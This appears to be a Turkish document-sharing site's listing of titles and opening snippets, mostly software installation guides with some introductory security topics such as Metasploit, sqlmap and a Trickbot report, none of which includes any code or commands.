
HAZIRLAYAN BEDRİ SERTKAYA bedri@bedrisertkaya.com Sistem Uzmanı CEH EĞİTMENİ

HAZIRLAYAN BEDRİ SERTKAYA bedri@bedrisertkaya.com Sistem Uzmanı CEH EĞİTMENİ HAZIRLAYAN BEDRİ SERTKAYA bedri@bedrisertkaya.com Sistem Uzmanı CEH EĞİTMENİ SİSTEM HACKİNG: Windows Sistem Güvenlik Denetimi: Security Account Manager:Güvenlik Hesabı Yöneticisi windows'da yer alan sunucularda

Detaylı

CYGWIN KURULUMU ve KULLANIMI

CYGWIN KURULUMU ve KULLANIMI CYGWIN KURULUMU ve KULLANIMI Cygwin, Microsoft Windows işletim sistemi üzerinde çalışan, open source, bir UNIX simülatörüdür. Cygwin`in asıl amacı *nix türevi sistemlerde yer alan yazılımların Windows

Detaylı

ADIM ADIM METASPLOIT METERPRETER SHELL DAVRANIŞ ANALİZİ

ADIM ADIM METASPLOIT METERPRETER SHELL DAVRANIŞ ANALİZİ 1. GİRİŞ Bu yazıda, Metasploit exploit frameworkü üzerinde bulunan meterpreter paylodunun kullandığı bazı modüllerin özellikle ağda ve sistem üzerindeki etkileri araştırılmıştır. Bu konuda SANS'ın da yararlı

Detaylı

WAMP SERVER KURULUMU

WAMP SERVER KURULUMU WAMP SERVER KURULUMU Bilgisayarınızda; PHP web programlama dilini kullanarak web sayfası hazırlayacaksanız ya da PHP web programlama dili kullanılarak hazırlanmış Joomla, Wordpress, Drupal vb.. içerik

Detaylı

Turquaz Windows kurulum dökümanı. ftp://ftp.mirror.ac.uk/sites/ftp.postgresql.org/binary/v7.3.1/windows/pgsql731wina1.exe

Turquaz Windows kurulum dökümanı. ftp://ftp.mirror.ac.uk/sites/ftp.postgresql.org/binary/v7.3.1/windows/pgsql731wina1.exe 1. Giriş Turquaz programını windows üzerinde çalıştırmak için öncelikle bilgisayarınızda postgresql ve Java nın kurulu olması gerekli. Aşağıdaki bilgi ve dökümanlar windows 2000 işletim sistemi üzerinde

Detaylı

Bu bölüm V- Ray License Server lisans sunucusu uygulamasının kurulumundan

Bu bölüm V- Ray License Server lisans sunucusu uygulamasının kurulumundan Lisans Sunucusu Kurulumu bahsedecektir. Bu bölüm V- Ray License Server lisans sunucusu uygulamasının kurulumundan V-Ray in bazı dağıtımlarında V-Ray License Server uygulamasını kuruludur. Yine de V- Ray

Detaylı

MICROSOFT SQL SERVER SIZMA VE GÜVENLİK TESTİ ÇALIŞMALARI

MICROSOFT SQL SERVER SIZMA VE GÜVENLİK TESTİ ÇALIŞMALARI MICROSOFT SQL SERVER SIZMA VE GÜVENLİK TESTİ ÇALIŞMALARI HALİL DALABASMAZ PENETRATION TESTING SPECIALIST ŞUBAT 2015 BGA BİLGİ GÜVENLİĞİ LİMİTED ŞİRKETİ WWW.BGA.COM.TR İÇİNDEKİLER 1. GİRİŞ... 1 2. MICROSOFT

Detaylı

Metasploit Framework ile Güvenlik Denetimi. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci at gamasec.net

Metasploit Framework ile Güvenlik Denetimi. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci at gamasec.net Metasploit Framework ile Güvenlik Denetimi Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci at gamasec.net Sunum İçeriği Exploit Kavramı Exploit Geliştirme Süreci Bütünleşik Geliştirme Ortamları Metasploit

Detaylı

NPratik Yazılım Kurulum Kılavuzu. Yedekleme İşlemi

NPratik Yazılım Kurulum Kılavuzu. Yedekleme İşlemi NPratik Yazılım Kurulum Kılavuzu Herhangi bir neden ile bilgisayarınızı formatlamadan önce NPratik Yazılım Verilerinizi yedeklemeniz gerekmektedir. Programı ilk defa kuruyorsanız NPratik Yazılım Kurulum

Detaylı

AKINSOFT. Eofis NetworkAdmin. AKINSOFT EOfis NetworkAdmin Kurulumu Bilgi Notu. Doküman Versiyon : 1.01.01 Tarih : 10.01.2008. Copyright 2008 AKINSOFT

AKINSOFT. Eofis NetworkAdmin. AKINSOFT EOfis NetworkAdmin Kurulumu Bilgi Notu. Doküman Versiyon : 1.01.01 Tarih : 10.01.2008. Copyright 2008 AKINSOFT AKINSOFT EOfis NetworkAdmin Kurulumu Bilgi Notu Doküman Versiyon : 1.01.01 Tarih : 10.01.2008 1 - Çalışma Şekli Hakkında Kısa Bilgi modülü kısaca aşağıdaki işlemleri yapar. Bu özelliklerin çalışabilmesi

Detaylı

e-imzatr Kurulum Klavuzu

e-imzatr Kurulum Klavuzu e-imzatr Kurulum Klavuzu Sürüm 0.0.1 İçindekiler İşletim Sistemi Sistem Türü Öğrenme Java yükleme Akis Kurulum Kullanıcı Doğrulama İşletim Sistemi Sistem Türü Öğrenme Bu başlıkta bilgisayarımızın mevcut

Detaylı

http://www.microsoft.com/visualstudio/eng/downloads

http://www.microsoft.com/visualstudio/eng/downloads Visual Studio 2012'nin kurulumunu, Visual Studio'nun kullanımını ve Windows Store'da basit bir proje hazırlanmasını anlatacağım. Hepsinden önce Visual Studio ortamından biraz bahsedelim. Visual Studio

Detaylı

e-imzatr Kurulum Klavuzu

e-imzatr Kurulum Klavuzu e-imzatr Kurulum Klavuzu Sürüm 0.0.1 1 İçindekiler İşletim Sistemi Sistem Türü Öğrenme Java yükleme Akis Kurulum Kart Okuyucu Sürücü Kurulum Kullanıcı Doğrulama 2 İşletim Sistemi Sistem Türü Öğrenme Bu

Detaylı

ETA:MOBİL KURULUM TALİMATI

ETA:MOBİL KURULUM TALİMATI ETA:MOBİL KURULUM TALİMATI ETA:Mobil Kurulum Adımları Kuruluma başlamadan önce ana bilgisayarınızda kontrol etmeniz gereken minimum gereksinimler aşağıda belirtilmiştir. 1. Microsoft Windows Versiyon Kurulum

Detaylı

06 - Bilgi Toplama ve Sosyal Mühendislik

06 - Bilgi Toplama ve Sosyal Mühendislik BGM 553 - Sızma Testleri ve Güvenlik Denetlemeleri-I Bilgi Güvenliği Mühendisliği Yüksek Lisans Programı Dr. Ferhat Özgür Çatak ozgur.catak@tubitak.gov.tr İstanbul Şehir Üniversitesi 2016 - Güz İçindekiler

Detaylı

Smoothwall URL Filter Kurulumu

Smoothwall URL Filter Kurulumu Smoothwall URL Filter Kurulumu Dosya, Kelime, Site, Url, İp bazlı erişim ve yasaklama işlemleri Merhaba bu yazımızda Smoothwall da URL Filter servisini ekleme ve özelliklerinden bahsedeceğiz. URL Filter

Detaylı

MaestroPanel Kurulum

MaestroPanel Kurulum MaestroPanel Kurulum 28.09.2011 Oğuzhan YILMAZ oguzhan@maestropanel.com Gereksinimler Windows Server 2008 R2 x64 Any Edition Web Platform Installer 3.0+ Desteklenen Yazılımlar MailEnable 5.x SQL Server

Detaylı

Metasploit Framework ile Güvenlik Denetimi. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net

Metasploit Framework ile Güvenlik Denetimi. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net Metasploit Framework ile Güvenlik Denetimi Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net Sunum İçeriği Exploit Kavramı Exploit Geliştirme Süreci Bütünleşik Geliştirme Ortamları Metasploit

Detaylı

Linux Ubuntu Kurulumu

Linux Ubuntu Kurulumu Linux Ubuntu Kurulumu Elbistan Meslek Yüksek Okulu 2016 2017 Bahar Yarıyılı https://wiki.ubuntu-tr.net/index.php?title=kurulum https://wiki.ubuntu-tr.net/index.php?title=ubuntu_linux_kurulum_rehberi Öğr.Gör.Murat

Detaylı

3CX Phonesystem Türkçe Anonsları Windows ve Linux İşletim Sistemlerinde Aktif Etme

3CX Phonesystem Türkçe Anonsları Windows ve Linux İşletim Sistemlerinde Aktif Etme 3CX Phonesystem Türkçe Anonsları Windows ve Linux İşletim Sistemlerinde Aktif Etme Windows: 1. Adım: Not: Versiyon 12.5, 14 ve 15 için aynı menü yolunda ancak görsellik farkı bulunmaktadır. V15 için: 3CX

Detaylı

Nagios Network Monitör Uygulaması -2

Nagios Network Monitör Uygulaması -2 Nagios Network Monitör Uygulaması -2 Erkan Esmer Temmuz, 2013 İçindekiler 1 Monitoring Sistemleri.......................................... 2 2 Nagios a Windows Sunucu Ekleme....................................

Detaylı

Sqlmap pyhton dili yazılarak geliştirilmiş Sql injection için testerlara son derece yardımcı olan bir araçtır.

Sqlmap pyhton dili yazılarak geliştirilmiş Sql injection için testerlara son derece yardımcı olan bir araçtır. SqlMap Kullanımı Sqlmap pyhton dili yazılarak geliştirilmiş Sql injection için testerlara son derece yardımcı olan bir araçtır. Temel olarak yaptığı işlem sizin belirtmiş olduğunuz parametrelere göre hedef

Detaylı

DESTEK DOKÜMANI. Ürün : Tiger Enterprise/ Tiger Plus/ Go Plus/Go Bölüm : Kurulum İşlemleri

DESTEK DOKÜMANI. Ürün : Tiger Enterprise/ Tiger Plus/ Go Plus/Go Bölüm : Kurulum İşlemleri LOGO PROGRAM KURULUMU VE AYARLARI Logo programlarının yüklemesi için kullanılacak,setup dosyaları ftp://download.logo.com.tr/ adresinden indirilerek yapılır. Örneğin Kobi ürünleri için; ftp://download.logo.com.tr/windows/kobi/guncel/go_plus/klasöründen

Detaylı

Network üzerinde MATLAB kurulması

Network üzerinde MATLAB kurulması Network üzerinde MATLAB kurulması MATLAB&Simulink www.figes.com.tr Bir network üzerinde MATLAB ın kurulmasına başlanmadan önce bir network lisansı açılması ve bunun için de kurulum yapılacak sunucunun

Detaylı

Ders Tanıtım Sunumu. Internet Programming II. Elbistan Meslek Yüksek Okulu 2012 2013 Bahar Yarıyılı. 26 Şub. 2013 Öğr. Gör.

Ders Tanıtım Sunumu. Internet Programming II. Elbistan Meslek Yüksek Okulu 2012 2013 Bahar Yarıyılı. 26 Şub. 2013 Öğr. Gör. Ders Tanıtım Sunumu Internet Programming II Elbistan Meslek Yüksek Okulu 2012 2013 Bahar Yarıyılı 26 Şub. 2013 Öğr. Gör. Murat KEÇECİOĞLU PHP Nedir? Platformdan bağımsız (işletim Sistemi) dinamik web sayfaları

Detaylı

NACA PROFİL AİLE GEOMETRİSİ HESAP PROGRAMI KULLANMA KILAVUZU

NACA PROFİL AİLE GEOMETRİSİ HESAP PROGRAMI KULLANMA KILAVUZU NACA PROFİL AİLE GEOMETRİSİ HESAP PROGRAMI KULLANMA KILAVUZU NACA kesit programı çizim programı Visual Basic V5.0 dilinde yazılmıştır. Programın amacı, kullanıcının istediği NACA kesitinin çizimini çok

Detaylı

Proticaret Exclusive Versiyon Yükseltme Dokümanı(v.3.0'dan v3.1.0'a)

Proticaret Exclusive Versiyon Yükseltme Dokümanı(v.3.0'dan v3.1.0'a) Proticaret Exclusive Versiyon Yükseltme Dokümanı(v.3.0'dan v3.1.0'a) Bu belge, Webmaster düzeyindeki kullanıcıların kurulu olan Proticaret Exclusive portalının versiyon v3.0'dan versiyon 3.1.0'a yükseltirken

Detaylı

BIND ile DNS Sunucu Kurulumu

BIND ile DNS Sunucu Kurulumu BIND ile DNS Sunucu Kurulumu BIND Nedir? BIND bir dns sunucusu yani unix ve linux sistemler üzerinde dns servis hizmetini veren başarılı bir daemondur. Kısacası en popüler DNS sunucu yazılımı BIND dir.

Detaylı

Örnek bir kullanım ve bilgisayar ağlarını oluşturan bileşenlerin özeti

Örnek bir kullanım ve bilgisayar ağlarını oluşturan bileşenlerin özeti Bu sayfaları okuduğunuza göre bir şekilde bilgisayarlar ve bilgisayar ağlarıyla ilişkiniz olduğunu biliyorum. Ancak yine de en başta niçin bilgisayar ağı kullanıyoruz sorusunun cevabını vermekle işe başlayabiliriz.

Detaylı

Bu makalede 2003 sunucu, Windows 2003 Server anlamına gelmektedir. Aşağıda yapılan işlemler 2003 R2 sunucu üzerinde denenmiş ve çalıştırılmıştır.

Bu makalede 2003 sunucu, Windows 2003 Server anlamına gelmektedir. Aşağıda yapılan işlemler 2003 R2 sunucu üzerinde denenmiş ve çalıştırılmıştır. WINDOWS 2003 SUNUCULARI ÜZERĐNE PHP YÜKLENMESĐ ERDAL YAZICIOĞLU erdal(at)gmail.com http://barbarossa41.wordpress.com Merhabalar, Çözümpark.com adresinde bir kullanıcı ASP ve PHP yi aynı sunucu üzerinde

Detaylı

JasperReports Server ve Ireport raporlama Sistemi Kurulumu / Kullanımı 1. Bölüm 2. Bölüm 1- JasperReports Server ve Ireport Nedir?

JasperReports Server ve Ireport raporlama Sistemi Kurulumu / Kullanımı 1. Bölüm 2. Bölüm 1- JasperReports Server ve Ireport Nedir? JasperReports Server ve Ireport raporlama Sistemi Kurulumu / Kullanımı 1. Bölüm 1.1- JasperReports Server ve Ireport Nedir? 1.2- JasperReports Server ve Ireport Kurulumu 1.3- JasperReports Server Genel

Detaylı

Ders Tanıtım Sunumu. Database Managegement II. Elbistan Meslek Yüksek Okulu Güz Yarıyılı. Öğr. Gör. Murat KEÇECĠOĞLU

Ders Tanıtım Sunumu. Database Managegement II. Elbistan Meslek Yüksek Okulu Güz Yarıyılı. Öğr. Gör. Murat KEÇECĠOĞLU Ders Tanıtım Sunumu Database Managegement II Elbistan Meslek Yüksek Okulu 2016 2017 Güz Yarıyılı Öğr. Gör. Murat KEÇECĠOĞLU 08 Eyl. 2016 KURULUM SQL SERVER 2016 yılı başlarında piyasaya çıkan SQL Server

Detaylı

ETKİLEŞİMLİ TAHTA KORUMA SİSTEMİ KURULUM

ETKİLEŞİMLİ TAHTA KORUMA SİSTEMİ KURULUM 1. Sistem 3 bileşenden oluşur a. Sunucu b. Koruma yazılımı c. Mobil anahtar ETKİLEŞİMLİ TAHTA KORUMA SİSTEMİ KURULUM Sunucu yazılımı: sunucu yazılımı öncelikle yerel ağda et (etkileşimli tahtaların) bağlı

Detaylı

Windows Server 2012 Kurulum Hazırlıkları. Windows Server 2012 Kurulum Seçenekleri. Windows Server 2012 Kurulum Adımları. Full GUI Kurulum Seçeneği

Windows Server 2012 Kurulum Hazırlıkları. Windows Server 2012 Kurulum Seçenekleri. Windows Server 2012 Kurulum Adımları. Full GUI Kurulum Seçeneği Merhaba, Aşağıda hazırlamış olduğum dokümanda Windows Server 2012 işletim sistemi kurulumunu sizlerle paylaşacağım. Windows Server 2012 Kurulum Hazırlıkları Eğer elinizde bir Windows Server 2012 işletim

Detaylı

Nova Dental 2008-3D Ana Makine Kurulum (Windows Server 2003- XP Home/Pro)

Nova Dental 2008-3D Ana Makine Kurulum (Windows Server 2003- XP Home/Pro) Nova Dental 2008-3D Ana Makine Kurulum (Windows Server 2003- XP Home/Pro) Bu yazıda bir NovaSoft Dental yazılımının ana makinaya kurulumunu göreceğiz. Index 1.Adım : NovaSoft Dental Kurulum CD/DVD'sinin

Detaylı

RPMNET WOLVOX REPORTER

RPMNET WOLVOX REPORTER RPMNET WOLVOX REPORTER TANITIM : EFAR YAZILIM LTD.STI Tarafından Geliştirilen EFAR Wolvox Reporter AKINSOFT Wolvox Kullanıcılarının Android İşletim Sistemi Yüklü Cep Telefonlarından Online Olarak Kullandıkları

Detaylı

VMware 4.0 vcenter Server Kurulumu

VMware 4.0 vcenter Server Kurulumu VMware 4.0 vcenter Server Kurulumu VMware ESX üzerinde sanal sunucu oluşturma makalemizde sizlere sanallaştırma teknolojilerinden birisi olan VMware ESX (vsphere) üzerinde sanal bir sunucunun nasıl oluşturulacağını

Detaylı

Internet Programming II

Internet Programming II Hafta I Internet Programming II Elbistan Meslek Yüksek Okulu 2015 2016 Bahar Yarıyılı Öğr. Gör. Murat KEÇECİOĞLU 15 Şub. 2015 PHP Nedir? Platformdan bağımsız (işletim Sistemi) dinamik web sayfaları ve

Detaylı

10.2 VERİYONUNUN KURULABİLMESİ İÇİN EĞER VARSA ÖNCEKİ. ArcGIS SÜRÜMLERİNİN PROGRAM EKLE-KALDIR SEÇENEĞİYLE

10.2 VERİYONUNUN KURULABİLMESİ İÇİN EĞER VARSA ÖNCEKİ. ArcGIS SÜRÜMLERİNİN PROGRAM EKLE-KALDIR SEÇENEĞİYLE 10.2 VERİYONUNUN KURULABİLMESİ İÇİN EĞER VARSA ÖNCEKİ ArcGIS SÜRÜMLERİNİN PROGRAM EKLE-KALDIR SEÇENEĞİYLE YADA BİR PROGRAM SİLME ARACIYLA SİLİNMESİ GEREKMEKTEDİR. PROGRAMIN İNDİRİLMESİ İki aylık deneme

Detaylı

Değerli Datasoft Kullanıcısı;

Değerli Datasoft Kullanıcısı; Değerli Datasoft Kullanıcısı; Datasoft Yazılım, Genel Muhasebe, İşletme Defteri ve BBS (Bürü Bilgi Sistemi) Serbest Meslek Defteri Programları Beyannameler bölümümden çalışan; beyanname paketlerini gönderme,

Detaylı

NA VNC SERVER KULLANIMI. Genel Bilgi NA VNC Server Ayarları

NA VNC SERVER KULLANIMI. Genel Bilgi NA VNC Server Ayarları NA VNC SERVER KULLANIMI Genel Bilgi NA VNC Server Ayarları Genel Bilgi Bu dökümanda NA ekranlarda VNC Server kullanımı anlatılmıştır. VNC, Virtual Network Computing kelimelerinin baş harflerinin bir araya

Detaylı

27 Kasım Ekran 1: ETA:SQL Yazılım Güncelleme Uygulaması

27 Kasım Ekran 1: ETA:SQL Yazılım Güncelleme Uygulaması 27 Kasım 2017 İlgili Versiyon/lar : ETA:SQL, ETA:V.8-SQL, ETA:SB İlgili Modül/ler : Genel ETA:SQL YAZILIM GÜNCELLEME UYGULAMASI Programlarımız teknolojik gelişmeler, mevzuat değişiklikleri, kullanıcı talepleri

Detaylı

VMware Üzerine BackTrack 5 Kurulumu

VMware Üzerine BackTrack 5 Kurulumu VMware Üzerine BackTrack 5 Kurulumu BackTrack geliştiricileri yeni sürümünde BackTrack kullanımını kolaylaştırmak için birkaç seçenek ile karşımıza çıktılar. BackTrack kullanım seçeneklerinden en etkilisi

Detaylı

Tarih: 2 Ağustos 2018 Son versiyon: 1.8. EndNote X9 Windows Multi/Site kurulum talimatları

Tarih: 2 Ağustos 2018 Son versiyon: 1.8. EndNote X9 Windows Multi/Site kurulum talimatları Tarih: 2 Ağustos 2018 Son versiyon: 1.8 EndNote X9 Windows Multi/Site kurulum talimatları İçerik 1 Giriş... 3 2 Oturum aç... 3 3 Download... 4 4 Son kullanıcı dosyası oluşturma... 4 2 1 Giriş ÖNEMLİ: EndNote

Detaylı

Denetim Masası/Programlar/Windows özelliklerini Aç/Kapat

Denetim Masası/Programlar/Windows özelliklerini Aç/Kapat Merhaba arkadaşlar, Bu yazımızda yerel ağda veya Ip adresimizle bir web sitesinin paylaşıma açılması, aynı ağdan veya uzaktan bir bilgisayarın web sitemize nasıl erişebileceği konuları üzerinde duracağız.

Detaylı

Exploit Geliştirme Altyapıları. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net

Exploit Geliştirme Altyapıları. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net Exploit Geliştirme Altyapıları Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net Sunum İçeriği Exploit Kavramı Exploit Geliştirme Süreci Bütünleşik Geliştirme Ortamları Önerilen Yazılımlar

Detaylı

Project Vesta Documentation

Project Vesta Documentation Project Vesta Documentation Sürüm 1.0.4 Ege Emir Ozkan Haz 23, 2017 İçindekiler 1 Giriş 3 2 Kurulum 5 2.1 Python, Pip ve Modüller......................................... 5 2.2 MySQL..................................................

Detaylı

Proticaret Exclusive Versiyon Yükseltme Dokümanı(v.3.2.0'dan v3.2.1'e)

Proticaret Exclusive Versiyon Yükseltme Dokümanı(v.3.2.0'dan v3.2.1'e) Proticaret Exclusive Versiyon Yükseltme Dokümanı(v.3.2.0'dan v3.2.1'e) Bu belge, Webmaster düzeyindeki kullanıcıların kurulu olan Proticaret Exclusive portalının versiyon v3.2.0'dan versiyon 3.2.1'e yükseltirken

Detaylı

Program Kurulum. Turquaz Muhasebe. İçindekiler

Program Kurulum. Turquaz Muhasebe. İçindekiler Program Kurulum Turquaz Muhasebe İçindekiler İÇİNDEKİLER 1 1. TEK KULLANICI 2 2. AĞ KURULUMU 4 2.1 VERİTABANI SERVER KURULUMU 4 2.2 VERİTABANI SERVER AYARLARI 11 2.3 DATALARIN YÜKLENMESİ 11 2.4 İSTEMCİ

Detaylı

Clonezilla Server ile Ağ Üzerinden Çoklu İmaj Yükleme

Clonezilla Server ile Ağ Üzerinden Çoklu İmaj Yükleme Clonezilla Server ile aynı ağ üzerinde bulunan birden fazla istemciye aynı anda imaj yükleyebilirsiniz. Bunun için gerekli tüm bileşenleri içerisinde barındıran DRBL (Diskless Remote Boot in Linux) sunucusunu

Detaylı

SAMURAİ FRAMEWORK İLE HACKİNG-1 (FOOTPRINTING)

SAMURAİ FRAMEWORK İLE HACKİNG-1 (FOOTPRINTING) SAMURAİ FRAMEWORK İLE HACKİNG-1 (FOOTPRINTING) Merhaba arkadaşlar. Samurai Framework ile Temel Hacking makale serisinin ikinci kısmını bu ve devamında ki makalelerimizde inceleyeceğiz. Bu makalemizde temel

Detaylı

Kurumsal Güvenlik ve Web Filtreleme

Kurumsal Güvenlik ve Web Filtreleme S a y f a 1 antikor Kurumsal Güvenlik ve Web Filtreleme SshClient, Putty v.s. S a y f a 2 S a y f a 3 Yönetici olarak AntiKor a girmek için SshClient veya Putty programı kullanılır. IP olarak kurum içinden

Detaylı

Mpuantor 2.7 Client Kurulumu

Mpuantor 2.7 Client Kurulumu Mikado Puantör 2.7 Mpuantor 2.7 Client Kurulumu 10.10.2014 Ümit Dinçer 2014,. Tüm Hakları Saklıdır. Mpuantor 2.7 Client Kurulumu i İ Ç İ N D E K İ L E R Mpuantor Yedekleme... 1 Mpuantor yedeklemesi...

Detaylı

"SQL Server Management Studio" yazılımını yüklemek için alttaki resmi sitesinden 180 günlük deneme sürümünü indirebilirsiniz.

SQL Server Management Studio yazılımını yüklemek için alttaki resmi sitesinden 180 günlük deneme sürümünü indirebilirsiniz. Microsoft SQL Server 2008 R2 Kurulumu "SQL Server Management Studio" yazılımını yüklemek için alttaki resmi sitesinden 180 günlük deneme sürümünü indirebilirsiniz. http://www.microsoft.com/sqlserver/en/us/get-sql-server/try-it.aspx

Detaylı

ETA:SQL VE ETA:V.8-SQL PROGRAMLARINDA INSTALL ĐŞLEMĐNDE ANA BĐLGĐSAYAR KAVRAMI

ETA:SQL VE ETA:V.8-SQL PROGRAMLARINDA INSTALL ĐŞLEMĐNDE ANA BĐLGĐSAYAR KAVRAMI 17 Mart 2010 Đlgili Versiyon/lar : ETA:SQL, ETA:V.8-SQL Đlgili Modül/ler : Genel BĐLGĐSAYAR DEĞĐŞĐKLĐĞĐ ve INSTALL ĐŞLEMĐ ETA:SQL VE ETA:V.8-SQL PROGRAMLARINDA INSTALL ĐŞLEMĐNDE ANA BĐLGĐSAYAR KAVRAMI

Detaylı

Ağ Üzerinde MATLAB kurulum rehberi (Sunucu makine)

Ağ Üzerinde MATLAB kurulum rehberi (Sunucu makine) Ağ Üzerinde MATLAB kurulum rehberi (Sunucu makine) İçindekiler Tablosu Dosyaların Bilgisayara İndirilmesi... 3 Dosyaların Bilgisayara Yüklenmesi... 5 1. İnternet Üzerinden Kurulum 5 1.1. Lisans Dosyasının

Detaylı

SQL SERVER 2005 ENTEGRE SQL (VTY) VERİ TABANI YÖNETİM KURULUMU RESİMLİ ANLATIMI. Entegre SQL kurmadan önce SQLSERVER 2005,i kuralım öncelikle.

SQL SERVER 2005 ENTEGRE SQL (VTY) VERİ TABANI YÖNETİM KURULUMU RESİMLİ ANLATIMI. Entegre SQL kurmadan önce SQLSERVER 2005,i kuralım öncelikle. SQL SERVER 2005 ENTEGRE SQL (VTY) VERİ TABANI YÖNETİM KURULUMU RESİMLİ ANLATIMI Entegre SQL kurmadan önce SQLSERVER 2005,i kuralım öncelikle. Kurulumu başlattık.kutucuğu işaretledik resimdeki gibi. Ve

Detaylı

Yerel Ağlarda Port 139 ve Saldırı Yöntemi

Yerel Ağlarda Port 139 ve Saldırı Yöntemi Yerel Ağlarda Port 139 ve Saldırı Yöntemi Merhaba arkadaşlar. Gerek kitap hazırlığında olmam, gerekse de işlerimin oldukça yoğun olmasından dolayı, bir süredir makale yayınlayamadım. Bu süre boşluğunu

Detaylı

Ubuntu Terminal Server Ve Uzak Masaüstü Sunucusu

Ubuntu Terminal Server Ve Uzak Masaüstü Sunucusu Ubuntu Terminal Server Ve Uzak Masaüstü Sunucusu Ünal YILMAZ unalyilmaz@hotmail.com Hakkımda 1976 da İstanbul da doğdum. Haydarpaşa Endüstri Meslek Lisesi Elektrik, Anadolu Üni. Önlisans Halkla ilişkiler,

Detaylı

Kurumsal Güvenlik ve Web Filtreleme

Kurumsal Güvenlik ve Web Filtreleme S a y f a 1 antikor Kurumsal Güvenlik ve Web Filtreleme SshClient, Putty v.s. S a y f a 2 S a y f a 3 S a y f a 4 S a y f a 5 S a y f a 6 S a y f a 7 şeklini alır. Bu durumda kullanıcı yasaklı konumdadır.

Detaylı

ecyber Kullanıcı Kılavuzu 1 / 1 1. ecyber hakkında... 1 2. Sistem gereksinimleri:... 2 Donanım:... 2 Yazılım:... 2 3. Kullanım Rehberi...

ecyber Kullanıcı Kılavuzu 1 / 1 1. ecyber hakkında... 1 2. Sistem gereksinimleri:... 2 Donanım:... 2 Yazılım:... 2 3. Kullanım Rehberi... ecyber Kullanıcı Kılavuzu 1 / 1 1. ecyber hakkında... 1 2. Sistem gereksinimleri:... 2 Donanım:... 2 Yazılım:... 2 3. Kullanım Rehberi... 3 İndirme... 3 Sunucu yazılım kurulumu... 3 Kurulum sayfası çıkacaktır...

Detaylı

Trickbot Zararlı Yazılımı İnceleme Raporu

Trickbot Zararlı Yazılımı İnceleme Raporu Trickbot ı İnceleme Raporu trickbot.exe isimli Trojan yazılımı son yıllarda sürekli geliştirilen ve yeni yetenekleri ile karşımıza çıkan bir zararlı yazılımdır. Zararlı olarak çalışma yöntemi Trojan olması

Detaylı

KULLANICI KILAVUZU: UEA FİX KULLANICILARININ SSLVPN ERİŞİMİ İMKB İÇİNDEKİLER

KULLANICI KILAVUZU: UEA FİX KULLANICILARININ SSLVPN ERİŞİMİ İMKB İÇİNDEKİLER KULLANICI KILAVUZU: UEA FİX KULLANICILARININ SSLVPN ERİŞİMİ İMKB Tarih: 29/01/2013 Versiyon Tarih Açıklama 1.0 29-01-13 İlk yazımı İÇİNDEKİLER 1. AMAÇ... 1-2 2. SSLVPN BAĞLANTI ADIMLARI... 2-2 2.1 Linux

Detaylı

Veri Tabanı Yönetim Sistemleri Bölüm - 02

Veri Tabanı Yönetim Sistemleri Bölüm - 02 Veri Tabanı Yönetim Sistemleri Bölüm - 02 İçerik Web sunucusunun yapılandırılması için gerekli yazılımların temini Yazılımlarının sunucuya yüklenmesi Ön test Uygulama yazılımlarının yapılandırılması Son

Detaylı

Windows 7'ye Format Atmak, XP Repair ve XP Kurmak

Windows 7'ye Format Atmak, XP Repair ve XP Kurmak Bu yazımda Windows 7 işletim sisteminin nasıl kurulacağını adım adım resimlerle öğreneceğiz.. Kurulumdan önce yapmamız gereken bir kaç adım var. Öncelikle elimizde olması gerekenler: 1- Windows 7 CD' si

Detaylı

KALİ SUNUCUDA TOR, PROXYCHAINS, PRIVOXY, TOR- TUNNEL KURULUMU VE KULLANIMI

KALİ SUNUCUDA TOR, PROXYCHAINS, PRIVOXY, TOR- TUNNEL KURULUMU VE KULLANIMI KALİ SUNUCUDA TOR, PROXYCHAINS, PRIVOXY, TOR- TUNNEL KURULUMU VE KULLANIMI Bu yazımda Kali Linux üzerinden taramaları ve çeşitli testleri gerçekleştirirken, eğer iz bırakmak ve hedef sistemlerde loglara

Detaylı

En bilindik truva atları Xtreme Rat ve Darkcomet Rattır.

En bilindik truva atları Xtreme Rat ve Darkcomet Rattır. Merhaba Arkadaşlar Türkçede Arka Kapı olarak geçen Backdoor kelimesine uzak olmadığımız gibi yakında değiliz. Arka Kapı terimi Matrixfilminde ki Seraph karakterinin anahtarla açtığı kapılardan ileri gitmiyor.

Detaylı

BLGM 354 DENEY 1 * GİRİŞ

BLGM 354 DENEY 1 * GİRİŞ BLGM 354 DENEY 1 * GİRİŞ Amaçlar 1. Oracle istemcisi kurulumu 2. Veritabanı bağlantısı 3. SQL geliştirme ortamında çalışma Oracle İstemcisinin Kurulumu Oracle istemcisi bölümün FTP sunucusundan (ftp://ftp.cmpe.emu.edu.tr)

Detaylı

Kaynak Kodlardan Derleme. Turquaz Muhasebe. Versiyon 0.2. Hüseyin Ergün. 26 Mart 2005

Kaynak Kodlardan Derleme. Turquaz Muhasebe. Versiyon 0.2. Hüseyin Ergün. 26 Mart 2005 Kaynak Kodlardan Derleme Turquaz Muhasebe Versiyon 0.2 Hüseyin Ergün 26 Mart 2005 Turquaz Muhasebe, Kaynak Kodları Derleme Sayfa 2 İçindekiler İÇİNDEKİLER 2 GEÇMİŞ DEĞİŞİKLİKLER 3 1. GİRİŞ 4 1.1 AÇIKLAMA

Detaylı

e-imzatr Kurulum Klavuzu

e-imzatr Kurulum Klavuzu e-imzatr Kurulum Klavuzu Sürüm 0.0.1 İçindekiler İşletim Sistemi Sistem Türü Öğrenme Java yükleme Akis Kurulum Kullanıcı Doğrulama İşletim Sistemi Sistem Türü Öğrenme Bu başlıkta bilgisayarımızın mevcut

Detaylı

PERKON PDKS Kurulum ve hızlı başlangıç rehberi

PERKON PDKS Kurulum ve hızlı başlangıç rehberi Oluşturma 02.11.2015 Revizyon: 19.01.2016 Rev. No: 03 Yazan: Süleyman FAKİR Düzenleyen: F. DELİRİ PERKON PDKS Kurulum ve hızlı başlangıç rehberi 1) PDKS Kurulumu, Lisans Onaylaması Ve Veri Tabanı Ayarları

Detaylı

Ürün Profil ve Yapılandırma Kodu Tanımlama

